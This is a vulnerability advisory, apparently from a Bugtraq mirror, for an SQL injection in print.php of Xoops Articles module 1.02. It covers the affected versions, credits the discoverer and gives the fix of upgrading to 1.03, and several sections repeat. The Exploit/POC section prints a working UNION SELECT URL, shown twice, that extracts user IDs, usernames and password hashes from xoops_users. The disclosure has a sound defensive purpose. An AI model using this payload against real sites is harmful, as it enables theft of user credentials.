Xoops Articles Module Print.PHP SQL Injection Vulnerability
BID:23160
Info
Xoops Articles Module Print.PHP SQL Injection Vulnerability
| Bugtraq ID: | 23160 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 27 2007 12:00AM |
| Updated: | Mar 28 2007 07:33PM |
| Credit: | UNIQUE-KEY[UNIQUE-CRACKER] is credited with the discovery of this vulnerability. |
| Vulnerable: |
Xoops Xoops Articles Module 1.02 |
| Not Vulnerable: |
Xoops Xoops Articles Module 1.03 |
Discussion
Xoops Articles Module Print.PHP SQL Injection Vulnerability
The Xoops Articles module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. This issue may help the attacker gain unauthorized access.
Xoops Articles module prior to version 1.03 are reported vulnerable.
The Xoops Articles module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. This issue may help the attacker gain unauthorized access.
Xoops Articles module prior to version 1.03 are reported vulnerable.
Exploit / POC
Xoops Articles Module Print.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof of concept and exploit code are available:
http://www.example.com/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
Attackers can use a browser to exploit this issue.
The following proof of concept and exploit code are available:
http://www.example.com/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
Solution / Fix
Xoops Articles Module Print.PHP SQL Injection Vulnerability
Solution:
The vendor has released Xoops Articles module 1.03 to address this issue; please see the reference section for details.
Xoops Xoops Articles Module 1.02
Solution:
The vendor has released Xoops Articles module 1.03 to address this issue; please see the reference section for details.
Xoops Xoops Articles Module 1.02
-
Cuyahoga XOOPS2_mod_articles_1.03_final_andym.zip
http://support.sirium.net/modules/mydownloads/viewcat.php?cid=2
References
Xoops Articles Module Print.PHP SQL Injection Vulnerability
References:
References:
- XOOPS Articles module Web Site (XOOPS Articles module)
- XOOPS Web Site (XOOPS)
- Re: Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And ([email protected])
- Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC (UNIQUE-KEY[UNIQUE-CRACKER])